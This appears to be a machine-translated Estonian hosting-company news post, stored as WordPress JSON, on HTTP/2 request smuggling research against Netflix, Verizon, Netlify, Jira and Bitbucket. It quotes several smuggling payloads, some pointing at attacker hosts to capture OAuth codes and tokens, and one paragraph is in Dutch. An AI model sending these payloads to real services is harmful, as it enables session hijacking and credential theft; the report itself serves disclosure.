{"id":100934,"date":"2021-08-07T16:22:34","date_gmt":"2021-08-07T14:22:35","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy"},"modified":"2026-02-09T17:18:09","modified_gmt":"2026-02-09T15:18:09","slug":"novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","status":"publish","type":"post","link":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","title":{"rendered":"Uus r\u00fcnnak front-end ja back-end s\u00fcsteemide vastu, mis v\u00f5imaldab sekkuda p\u00e4ringutesse.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Veebis\u00fcsteemid, kus eesmine osa v\u00f5tab \u00fchendusi HTTP\/2 kaudu ja edastab tagumise osa kaudu HTTP\/1.1, on saanud uue r\u00fcnnakuvariandi &#171;HTTP Request Smuggling&#187; ohvriks, mis v\u00f5imaldab saata spetsiaalselt vormindatud kliendip\u00e4ringute kaudu teiste kasutajate p\u00e4ringute sisu, mis t\u00f6\u00f6deldakse samas voos ees- ja tagumise osa vahel. R\u00fcnnakut v\u00f5ib kasutada pahatahtliku JavaScript-koodi sisse suunamiseks legitiimsete veebisaitide seanssi, juurdep\u00e4\u00e4supiirangute s\u00fcsteemide \u00fcmbersuunamiseks ja autentimisparametrite p\u00fc\u00fcdmise jaoks.     <\/p>\n<p>Probleem m\u00f5jutab veebiproxisi, koormuse jaotureid, veebia kiirusakseleraatoreid, sisu edastamise s\u00fcsteeme ja muid konfiguratsioone, kus p\u00e4ringud suunatakse ees- ja tagumise osa skeemi kaudu. Uuringu autor demonstreeris r\u00fcnnaku v\u00f5imalust Netflixi, Verizon'i, Bitbucket'i, Netlify CDN'i ja Atlassiani s\u00fcsteemide vastu, teenides 56 000 dollarit haavatavuste tuvastamise h\u00fcvitiste programmides. Probleemi olemasolu on kinnitatud ka F5 Networks'i toodetes. Osaliselt m\u00f5jutab probleem mod_proxy-d Apache http-serveris (CVE-2021-33193), parandusi oodatakse versioonis 2.4.49 (arendajaid teavitati probleemist mai alguses ja neil anti 3 kuud paranduste tegemiseks). Nginx'is on samaaegne 'Content-Length' ja 'Transfer-Encoding' p\u00e4iste m\u00e4\u00e4ramine blokeeritud eelmises v\u00e4ljaandes (1.21.1). R\u00fcnnaku teostamise vahendid on juba lisatud Burpi t\u00f6\u00f6riistakomplekti ja on saadaval Turbo Intruder laienduse kujul.      <\/p>\n<p>Uue r\u00fcnnaku meetodi toimimise p\u00f5him\u00f5te on sarnane kahe aasta eest sama teadlase leidud haavatavusele, kuid piiratud HTTP\/1.1 p\u00e4ringut vastu v\u00f5tva eesmise osaga. Tuletame meelde, et ees- ja tagumise osa skeemis v\u00f5tab kliendip\u00e4ringud vastu t\u00e4iendav s\u00f5lm \u2014 eesmine osa, mis loob pikaajalise TCP-\u00fchenduse tagumise osaga, mis tegeleb otseselt p\u00e4ringute t\u00f6\u00f6tlemisega. Selle kaudu edastatakse tavaliselt erinevatest kasutajatest p\u00e4ringud, mis j\u00e4rgivad \u00fcksteist HTTP protokolliga eraldamise vahenditega.     <\/p>\n<p>Klassikaline r\u00fcnnak \u201eHTTP Request Smuggling\u201d p\u00f5hines asjaolul, et esik\u00fcljed ja tagak\u00fcljed t\u00f5lgendavad HTTP-pealkirjade \u201eContent-Length\u201d (mille m\u00e4\u00e4ratleb k\u00f5ige \u00fcldine andmete maht p\u00e4ringus) ja \u201eTransfer-Encoding: chunked\u201d (mis v\u00f5imaldab andmete edastamist osade kaupa) kasutamist erinevalt. N\u00e4iteks, kui esik\u00fclg toetab ainult \u201eContent-Length\u201d, kuid ignoreerib \u201eTransfer-Encoding: chunked\u201d, v\u00f5ib r\u00fcndaja saata p\u00e4ringu, milles on samal ajal m\u00e4\u00e4ratud nii \u201eContent-Length\u201d kui ka \u201eTransfer-Encoding: chunked\u201d, kuid \u201eContent-Length\u201d suurus ei vasta chunked-ahelale. Sellisel juhul t\u00f6\u00f6tleb esik\u00fclg p\u00e4ringu ja suunab selle edasi vastavalt \u201eContent-Length\u2019ile\u201d, samas kui tagak\u00fclg ootab ploki l\u00f5petamist \u201eTransfer-Encoding: chunked\u201d p\u00f5hjal, ja r\u00fcndaja \u00fclej\u00e4\u00e4nud p\u00e4ringu l\u00f5pp satub teise kasutaja j\u00e4rgnevasse p\u00e4ringusse.         <\/p>\n<p>Erinevalt tekstiprotokollist HTTP\/1.1, mille anal\u00fc\u00fcs toimub ridade tasemel, on HTTP\/2 binaarne protokoll, mis manipuleerib eelnevalt m\u00e4\u00e4ratud suurusega andmeplokkidega. Lisaks kasutatakse HTTP\/2-s pseudopealkirju, mis vastavad tavap\u00e4rastele HTTP pealkirjadele. Kui front-end suhtleb back-end'iga HTTP\/1.1 protokolli kaudu, t\u00f5lgib front-end need pseudopealkirjad sarnasteks HTTP\/1.1 pealkirjadeks. Probleem on selles, et back-end teeb voolu anal\u00fc\u00fcsi otsuseid juba front-end'ilt saadud HTTP pealkirjade alusel, ilma et tal oleks teavet algse p\u00e4ringu parameetrite kohta.      <\/p>\n<p>Sealhulgas pseudopealkirjade vormis v\u00f5ivad edastada v\u00e4\u00e4rtusi \u201econtent-length\u201d ja \u201etransfer-encoding\u201d, kuigi neid ei kasutata HTTP\/2-s, kuna k\u00f5igi andmete suurus m\u00e4\u00e4ratakse eraldi v\u00e4ljas. Siiski, HTTP\/2 p\u00e4ringu konverteerimise k\u00e4igus HTTP\/1.1-ks kantakse need pealkirjad edasi ja v\u00f5ivad tagak\u00fclge eksitada. Tuvastatakse kaks peamist r\u00fcnnakute varianti: H2.TE ja H2.CL, kus tagak\u00fclg eksitatakse vale \u201etransfer-encoding\u201d v\u00f5i \u201econtent-length\u201d v\u00e4\u00e4rtuse t\u00f5ttu, mis ei vasta p\u00e4ringu tegelikule keha suurusele, mis on esik\u00fcljele edastatud HTTP\/2 protokolli kaudu.    <center><img decoding=\"async\" alt=\"Uus r\u00fcnnak front-end ja back-end s\u00fcsteemide vastu, mis v\u00f5imaldab sekkuda p\u00e4ringutesse.\" src=\"\/wp-content\/uploads\/2021\/08\/1ea8d97902bf7c4281adce29351c96fc.png\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>H2.CL r\u00fcnnakute n\u00e4itena toodi v\u00e4lja vale suuruse m\u00e4\u00e4ramine pseudopealkirjas content-length, kui saadeti HTTP\/2 p\u00e4ring Netflixi. See p\u00e4ring toob kaasa sarnase HTTP-pealkirja C\u043entent-Length lisamise, kui p\u00f6\u00f6rdutakse b\u00e4ndi poole HTTP\/1.1 kaudu, kuid kuna C\u043entent-Length'is m\u00e4rgitud suurus on v\u00e4iksem kui tegelik, t\u00f6\u00f6deldakse andmete osa l\u00f5pus kui j\u00e4rgmise p\u00e4ringu algust.     <\/p>\n<p>N\u00e4iteks, HTTP\/2 p\u00e4ring: :method\tPOST     :path\t\/n     :authority\twww.netflix.com     content-length\t4     abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar      <\/p>\n<p>Toob kaasa p\u00e4ringu saatmise b\u00e4ndile: POST \/n HTTP\/1.1     Host: www.netflix.com     Content-Length: 4       abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar    <\/p>\n<p> Kuna Content-Length on 4, peab tagak\u00fclg p\u00e4ring keha ainult \u201eabcd\u201d olema ja \u00fclej\u00e4\u00e4nud osa \u201eGET \/n HTTP\/1.1\u2026;\u201d t\u00f6\u00f6tleb kui algust j\u00e4rgnevast p\u00e4ringust, mis on seotud teise kasutajaga. Seega toimub voogude des\u00fcnkroniseerimine ja vastuseks sellele j\u00e4rgnevatele p\u00e4ringutele antakse tavap\u00e4rane t\u00f6\u00f6tlemise tulemus vale p\u00e4ringu jaoks. Netflixi puhul t\u00f5i k\u00f5rvalise hosti m\u00e4\u00e4ramine pealkirjas \u201eHost:\u201d vale p\u00e4ringu puhul kaasa kliendi vastuse \u201eLocation: https:\/\/02.rs?x.netflix.com\/n\u201d ja v\u00f5imaldas edastada kliendile suvalist sisu, sealhulgas k\u00e4ivitada oma JavaScripti koodi Netflixi saidi kontekstis.      <\/p>\n<p>Teine r\u00fcnnakuv\u00f5imalus (H2.TE) on seotud pealkirja &#171;Transfer-Encoding: chunked&#187; sisestamisega. HTTP\/2 spetsifikatsioonis on pseudo-pealkirja transfer-encoding kasutamine keelatud ja sellega koormatud p\u00e4ringud on m\u00e4\u00e4ratud t\u00f5lgendamiseks valedena. Sellest hoolimata ei arvesta m\u00f5ned eesrindrakenduste teostused selle n\u00f5udega ja lubavad pseudo-pealkirja transfer-encoding kasutamist HTTP\/2-s, mis muudetakse sarnaseks HTTP pealkirjaks. Kui pealkiri &#171;Transfer-Encoding&#187; on olemas, v\u00f5ib backend t\u00f5lgendada seda prioriteetsemana ja t\u00f6\u00f6tlema andmeid osade kaupa &#171;chunked&#187; re\u017eiimis, kasutades erineva suurusega juhte vormingus &#171;{suurus}&#092;r&#092;n{block}&#092;r&#092;n{suurus}&#092;r&#092;n{block}&#092;r&#092;n0&#187;, hoolimata algsest eraldamisest \u00fcldise suuruse alusel.    <\/p>\n<p>Sarnase haavatavuse demonstratsioon toimus ettev\u00f5tte Verizon n\u00e4itel. Probleem puudutas autentimisportaali ja <a href=\"https:\/\/prohoster.info\/et\/hosting\/hosting-wordpress\/\"  data-wpil-monitor-id=\"1168\">sisuhalduss\u00fcsteem<\/a>, mida kasutatakse ka sellistes saitides nagu Huffington Post ja Engadget. N\u00e4iteks, kliendi p\u00e4ring HTTP\/2 kaudu: :method\tPOST     :path\t\/identitfy\/XUI     :authority\tid.b2b.oath.com     transfer-encoding\tchunked      0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=\"    <\/p>\n<p>Saatis backend-ile HTTP\/1.1 p\u00e4ringu:       POST \/identity\/XUI HTTP\/1.1     Host: id.b2b.oath.com     Content-Length: 66     Transfer-Encoding: chunked       0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=\"      <\/p>\n<p>Backend ignoreeris omakorda pealkirja &#171;Content-Length&#187; ja tegi voos jagamise &#171;Transfer-Encoding: chunked&#187; alusel. Praktikas v\u00f5imaldas r\u00fcnnak suunata kasutajate p\u00e4ringud oma saidile ja sealhulgas haarata p\u00e4ringud, mis olid seotud OAuth autentimisega, mille parameetrid ilmnesid Referer pealkirjas, ning simuleerida autentimisseanssi ja algatada kasutaja mandaadi saatmise r\u00fcndaja hostile. GET \/b2blanding\/show\/oops HTTP\/1.1 Host: psres.net Referer: https:\/\/id.b2b.oath.com\/?&#8230;&#038;code=secret GET \/ HTTP\/1.1 Host: psres.net Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik&#8230;        <\/p>\n<p>HTTP\/2 teostuste r\u00fcndamiseks, mis ei luba pseudo-pealkirja transfer-encoding n\u00e4itamist, on v\u00e4lja pakutud veel \u00fcks meetod, mis on seotud pealkirja &#171;Transfer-Encoding&#187; sisestamisega, kinnitades selle teiste pseudo-pealkirjade k\u00fclge, kasutades reavahetust (HTTP\/1.1-s muudetakse sellisel juhul kaheks eraldi HTTP-pealkirjaks).     <\/p>\n<p>N\u00e4iteks olid Atlassian Jira ja Netlify CDN (mille kaudu serveeritakse Mozilla alguslehte Firefoxis) vastuv\u00f5tlikud nimetatud probleemile. Konkreetsemalt, HTTP\/2 p\u00e4ring :method\tPOST     :path\t\/     :authority\tstart.mozilla.org     foo\tb&#092;r&#092;n     transfer-encoding: chunked     0&#092;r&#092;n     &#092;r&#092;n     GET \/ HTTP\/1.1&#092;r&#092;n     Host: evil-netlify-domain&#092;r&#092;n     Content-Length: 5&#092;r&#092;n     &#092;r&#092;n     x=    <\/p>\n<p>t\u00f5i endaga kaasa HTTP\/1.1 p\u00e4ringu saatmise backendile       POST \/ HTTP\/1.1&#092;r&#092;n     Host: start.mozilla.org&#092;r&#092;n     Foo: b&#092;r&#092;n     Transfer-Encoding: chunked&#092;r&#092;n     Content-Length: 71&#092;r&#092;n     &#092;r&#092;n     0&#092;r&#092;n     &#092;r&#092;n     GET \/ HTTP\/1.1&#092;r&#092;n     Host: evil-netlify-domain&#092;r&#092;n     Content-Length: 5&#092;r&#092;n     &#092;r&#092;n     x=      <\/p>\n<p>Veel van de mogelijkheden om de header &#171;Transfer-Encoding&#187; in te voegen omvatten het vastmaken ervan aan de naam van een andere pseudo-header of aan de regel met de verzoekmethode. Bijvoorbeeld, wanneer men verbinding maakt met Atlassian Jira, leidde de naam van de pseudo-header &#171;foo: bar&#092;r&#092;ntransfer-encoding&#187; met de waarde &#171;chunked&#187; tot de toevoeging van de HTTP-headers &#171;foo: bar&#187; en &#171;transfer-encoding: chunked&#187;, terwijl het specificeren van de pseudo-header &#171;:method&#187;\twaarde &#171;GET \\\/ HTTP\\\/1.1&#092;r&#092;nTransfer-encoding: chunked&#187; werd vertaald naar &#171;GET \\\/ HTTP\\\/1.1&#092;r&#092;ntransfer-encoding: chunked&#187;.     <\/p>\n<p>Probleemi avastanud teadlane pakkus v\u00e4lja ka p\u00e4ringute tunnelimise tehniku, et r\u00fcnnata frontende, kus iga\u00fche jaoks <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/et\/lir\/ipv4\/\"   title=\"IP-aadressid\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"688\">IP-aadressid<\/a> luuakse eraldi \u00fchendus tagak\u00fcljega ning erinevate kasutajate liiklus ei segune. Pakutud tehnika ei luba teiste kasutajate p\u00e4ringutesse sekkuda, kuid v\u00f5imaldab saata jagatud vahem\u00e4lu, mis m\u00f5jutab teiste p\u00e4ringute t\u00f6\u00f6tlemist, ja v\u00f5imaldab sisemiste HTTP-pealkirjade asendamist, mida kasutatakse teenuste edastamiseks frontendi ja tagak\u00e4e vahel (n\u00e4iteks suunates frontendis autentimise k\u00e4igus tagak\u00fcljele praeguse kasutaja andmed). N\u00e4iteks selle meetodi rakendamine praktiliselt vahem\u00e4lu saastamise kaudu andis kontrolli lehtede \u00fcle Bitbucket teenuses.<br \/>\n<br \/>Allikas: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55601\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &#171;HTTP Request Smuggling&#187;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":100935,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100934","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"et_EE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-07T14:22:35+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-02-09T15:18:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Uus r\u00fcnnak front-end\/tagak\u00fclje s\u00fcsteemidele, mis v\u00f5imaldab sekkuda p\u00e4ringutesse | ProHoster","description":"Veebis\u00fcsteemid, kus front-end veebis \u00fchendub HTTP\/2 kaudu ja edastab tagak\u00fcljele HTTP\/1.1 kaudu, on saanud uue r\u00fcnnaku \"HTTP Request Smuggling\" variandi ohvriks, mis v\u00f5imaldab saata spetsiaalselt vormindatud.","canonical_url":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"et_EE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster","og:description":"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.","og:url":"https:\/\/prohoster.info\/et\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-07T14:22:35+00:00","article:modified_time":"2026-02-09T15:18:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100934","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-07 15:27:20","updated":"2026-02-09 15:18:09","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/comments?post=100934"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934\/revisions"}],"predecessor-version":[{"id":158412,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/posts\/100934\/revisions\/158412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/media\/100935"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/media?parent=100934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/categories?post=100934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/et\/wp-json\/wp\/v2\/tags?post=100934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}